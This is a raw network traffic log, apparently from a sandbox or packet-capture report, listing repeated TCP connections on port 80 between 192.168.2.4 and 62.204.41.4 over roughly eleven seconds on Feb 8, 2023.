                            Feb 8, 2023 17:40:07.171881914 CET805028162.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:07.172045946 CET5028180192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:07.173250914 CET5028180192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:07.235677958 CET805028162.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:07.238677025 CET805028162.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:07.238815069 CET5028180192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:07.341752052 CET5028180192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:07.342505932 CET5028280192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:07.405292988 CET805028262.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:07.405493021 CET5028280192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:07.405618906 CET805028162.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:07.405693054 CET5028180192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:07.406028986 CET5028280192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:07.468950033 CET805028262.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:07.471127033 CET805028262.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:07.471220970 CET5028280192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:07.575988054 CET5028280192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:07.576920033 CET5028380192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:07.637474060 CET805028262.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:07.637548923 CET5028280192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:07.638108015 CET805028362.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:07.638263941 CET5028380192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:07.638780117 CET5028380192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:07.701129913 CET805028362.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:07.703903913 CET805028362.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:07.704000950 CET5028380192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:07.810904980 CET5028380192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:07.811017990 CET5028480192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:07.871304035 CET805028462.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:07.871392965 CET5028480192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:07.872275114 CET805028362.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:07.872354984 CET5028380192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:07.872772932 CET5028480192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:07.933490992 CET805028462.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:07.935564041 CET805028462.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:07.935703993 CET5028480192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:08.044841051 CET5028480192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:08.045666933 CET5028580192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:08.105206966 CET805028462.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:08.106183052 CET805028562.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:08.106333971 CET5028480192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:08.106379986 CET5028580192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:08.115127087 CET5028580192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:08.175681114 CET805028562.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:08.178375959 CET805028562.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:08.178524971 CET5028580192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:08.295245886 CET5028580192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:08.298758984 CET5028680192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:08.356055975 CET805028562.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:08.356358051 CET5028580192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:08.358484030 CET805028662.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:08.361526966 CET5028680192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:08.361526966 CET5028680192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:08.421490908 CET805028662.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:08.423818111 CET805028662.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:08.427553892 CET5028680192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:08.536365986 CET5028680192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:08.537064075 CET5028780192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:08.596266031 CET805028662.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:08.597152948 CET805028762.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:08.597368002 CET5028780192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:08.597774982 CET5028780192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:08.599541903 CET5028680192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:08.657954931 CET805028762.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:08.659910917 CET805028762.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:08.660001993 CET5028780192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:08.771425962 CET5028780192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:08.772646904 CET5028880192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:08.831751108 CET805028762.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:08.832478046 CET5028780192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:08.834127903 CET805028862.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:08.838165045 CET5028880192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:08.838915110 CET5028880192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:08.900552034 CET805028862.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:08.902780056 CET805028862.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:08.904921055 CET5028880192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:09.015862942 CET5028880192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:09.016666889 CET5028980192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:09.077550888 CET805028862.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:09.078223944 CET805028962.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:09.078325987 CET5028980192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:09.079622030 CET5028880192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:09.090061903 CET5028980192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:09.151802063 CET805028962.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:09.153785944 CET805028962.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:09.153953075 CET5028980192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:09.264062881 CET5028980192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:09.265594959 CET5029080192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:09.327936888 CET805029062.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:09.328098059 CET5029080192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:09.328460932 CET5029080192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:09.388880968 CET805029062.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:09.391062021 CET805029062.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:09.391190052 CET5029080192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:09.498218060 CET5029080192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:09.499193907 CET5029180192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:09.558871984 CET805029062.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:09.559017897 CET5029080192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:09.559643984 CET805029162.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:09.559793949 CET5029180192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:09.560444117 CET5029180192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:09.575066090 CET5028980192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:09.621032000 CET805029162.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:09.623384953 CET805029162.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:09.623527050 CET5029180192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:09.637044907 CET805028962.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:09.637306929 CET5028980192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:09.732522964 CET5029180192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:09.733462095 CET5029280192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:09.793266058 CET805029162.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:09.793458939 CET5029180192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:09.793586016 CET805029262.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:09.793761969 CET5029280192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:09.795778036 CET5029280192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:09.856142998 CET805029262.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:09.858160973 CET805029262.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:09.858309031 CET5029280192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:09.967320919 CET5029280192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:09.968034983 CET5029380192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:10.027538061 CET805029362.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:10.027648926 CET805029262.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:10.027838945 CET5029280192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:10.027924061 CET5029380192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:10.028486967 CET5029380192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:10.087924957 CET805029362.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:10.091244936 CET805029362.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:10.091403961 CET5029380192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:10.207262993 CET5029380192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:10.208290100 CET5029480192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:10.267086983 CET805029362.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:10.267157078 CET5029380192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:10.269714117 CET805029462.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:10.269834042 CET5029480192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:10.272901058 CET5029480192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:10.334319115 CET805029462.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:10.336535931 CET805029462.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:10.336630106 CET5029480192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:10.451930046 CET5029480192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:10.453037024 CET5029580192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:10.513992071 CET805029462.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:10.514164925 CET5029480192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:10.514631033 CET805029562.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:10.514821053 CET5029580192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:10.522022009 CET5029580192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:10.583743095 CET805029562.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:10.586210966 CET805029562.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:10.586361885 CET5029580192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:10.701303959 CET5029580192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:10.702097893 CET5029680192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:10.763036966 CET805029562.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:10.763119936 CET5029580192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:10.763371944 CET805029662.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:10.763453960 CET5029680192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:10.763881922 CET5029680192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:10.825186014 CET805029662.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:10.827420950 CET805029662.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:10.827548027 CET5029680192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:10.940159082 CET5029680192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:10.941010952 CET5029780192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:11.001738071 CET805029662.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:11.001808882 CET5029680192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:11.003328085 CET805029762.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:11.003442049 CET5029780192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:11.003849983 CET5029780192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:11.066051960 CET805029762.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:11.070122004 CET805029762.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:11.070265055 CET5029780192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:11.195661068 CET5029780192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:11.196712017 CET5029880192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:11.257930994 CET805029762.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:11.257994890 CET5029780192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:11.259157896 CET805029862.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:11.259273052 CET5029880192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:11.262830019 CET5029880192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:11.325256109 CET805029862.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:11.327487946 CET805029862.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:11.327567101 CET5029880192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:11.438276052 CET5029880192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:11.439131975 CET5029980192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:11.499619961 CET805029962.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:11.499737978 CET5029980192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:11.500143051 CET5029980192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:11.500714064 CET805029862.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:11.500786066 CET5029880192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:11.560592890 CET805029962.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:11.562865973 CET805029962.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:11.562962055 CET5029980192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:11.670320034 CET5029980192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:11.671256065 CET5030080192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:11.731087923 CET805029962.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:11.731179953 CET5029980192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:11.732671976 CET805030062.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:11.732783079 CET5030080192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:11.733230114 CET5030080192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:11.795970917 CET805030062.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:11.798274994 CET805030062.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:11.798387051 CET5030080192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:11.920666933 CET5030080192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:11.921578884 CET5030180192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:11.983129978 CET805030062.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:11.983269930 CET5030080192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:11.984432936 CET805030162.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:11.984620094 CET5030180192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:11.986985922 CET5030180192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:12.049240112 CET805030162.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:12.053431988 CET805030162.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:12.053560972 CET5030180192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:12.174083948 CET5030180192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:12.175007105 CET5030280192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:12.238459110 CET805030262.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:12.238492012 CET805030162.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:12.238580942 CET5030280192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:12.238630056 CET5030180192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:12.239778042 CET5030280192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:12.301055908 CET805030262.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:12.303134918 CET805030262.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:12.303232908 CET5030280192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:12.421221018 CET5030280192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:12.422103882 CET5030380192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:12.482722044 CET805030362.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:12.482954979 CET805030262.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:12.483127117 CET5030280192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:12.485910892 CET5030380192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:12.489379883 CET5030380192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:12.549982071 CET805030362.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:12.552189112 CET805030362.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:12.553020000 CET5030380192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:12.679497957 CET5030380192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:12.681786060 CET5030480192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:12.741506100 CET805030362.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:12.741761923 CET5030380192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:12.742522955 CET805030462.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:12.742671013 CET5030480192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:12.743685007 CET5030480192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:12.804231882 CET805030462.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:12.806556940 CET805030462.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:12.812365055 CET5030480192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:12.925760031 CET5030480192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:12.926740885 CET5030580192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:12.986330032 CET805030462.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:12.988157034 CET805030562.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:12.988357067 CET5030580192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:12.988862991 CET5030580192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:12.989932060 CET5030480192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:13.050240993 CET805030562.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:13.054493904 CET805030562.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:13.054572105 CET5030580192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:13.172111988 CET5030580192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:13.173023939 CET5030680192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:13.233491898 CET805030662.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:13.233606100 CET5030680192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:13.233613968 CET805030562.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:13.233720064 CET5030580192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:13.234357119 CET5030680192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:13.295905113 CET805030662.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:13.299527884 CET805030662.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:13.299606085 CET5030680192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:13.416137934 CET5030680192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:13.416871071 CET5030780192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:13.478137970 CET805030662.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:13.478318930 CET5030680192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:13.479907036 CET805030762.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:13.480042934 CET5030780192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:13.620719910 CET5030780192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:13.682461023 CET805030762.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:13.684689999 CET805030762.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:13.684840918 CET5030780192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:13.837018967 CET5030780192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:13.837661982 CET5030880192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:13.899295092 CET805030862.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:13.899509907 CET5030880192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:13.904663086 CET805030762.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:13.904846907 CET5030780192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:13.941052914 CET5030880192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:14.002788067 CET805030862.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:14.005723000 CET805030862.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:14.005856991 CET5030880192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:14.149012089 CET5030880192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:14.149832964 CET5030980192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:14.210773945 CET805030862.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:14.210922003 CET5030880192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:14.211412907 CET805030962.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:14.211749077 CET5030980192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:14.212817907 CET5030980192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:14.274533033 CET805030962.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:14.277204990 CET805030962.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:14.277343035 CET5030980192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:14.388499975 CET5030980192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:14.389250994 CET5031080192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:14.449944019 CET805031062.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:14.450162888 CET5031080192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:14.450357914 CET805030962.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:14.450468063 CET5030980192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:15.001847029 CET5031080192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:15.062360048 CET805031062.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:15.067188978 CET805031062.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:15.067318916 CET5031080192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:15.217456102 CET5031080192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:15.218288898 CET5031180192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:15.277852058 CET805031162.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:15.277899027 CET805031062.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:15.278074026 CET5031180192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:15.278075933 CET5031080192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:15.296989918 CET5031180192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:15.356354952 CET805031162.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:15.358453035 CET805031162.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:15.358580112 CET5031180192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:15.473695993 CET5031180192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:15.474320889 CET5031280192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:15.533126116 CET805031162.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:15.533222914 CET5031180192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:15.534859896 CET805031262.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:15.534951925 CET5031280192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:15.535341024 CET5031280192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:15.595792055 CET805031262.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:15.597728014 CET805031262.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:15.597867012 CET5031280192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:16.449824095 CET5031280192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:16.450887918 CET5031380192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:16.510462999 CET805031262.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:16.510665894 CET5031280192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:16.513272047 CET805031362.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:16.513505936 CET5031380192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:16.587697983 CET5031380192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:16.650634050 CET805031362.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:16.652751923 CET805031362.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:16.652930975 CET5031380192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:16.788192034 CET5031380192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:16.789022923 CET5031480192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:16.850434065 CET805031362.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:16.850455999 CET805031462.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:16.850579977 CET5031380192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:16.850645065 CET5031480192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:17.451507092 CET5031480192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:17.513328075 CET805031462.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:17.515319109 CET805031462.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:17.515460968 CET5031480192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:17.641869068 CET5031480192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:17.642612934 CET5031580192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:17.703867912 CET805031462.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:17.703941107 CET805031562.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:17.704019070 CET5031480192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:17.704082966 CET5031580192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:17.704524994 CET5031580192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:17.765846014 CET805031562.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:17.767868996 CET805031562.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:17.768004894 CET5031580192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:17.877322912 CET5031580192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:17.878163099 CET5031680192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:17.938831091 CET805031562.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:17.938940048 CET5031580192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:17.939577103 CET805031662.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:17.939677000 CET5031680192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:17.940022945 CET5031680192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:18.001432896 CET805031662.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:18.003640890 CET805031662.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:18.003797054 CET5031680192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:18.110177040 CET5031680192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:18.110853910 CET5031780192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:18.171825886 CET805031662.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:18.171967983 CET5031680192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:18.172111988 CET805031762.204.41.4192.168.2.4
                            Feb 8, 2023 17:40:18.172195911 CET5031780192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:18.173072100 CET5031780192.168.2.462.204.41.4
                            Feb 8, 2023 17:40:18.234338045 CET805031762.204.41.4192.168.2.4
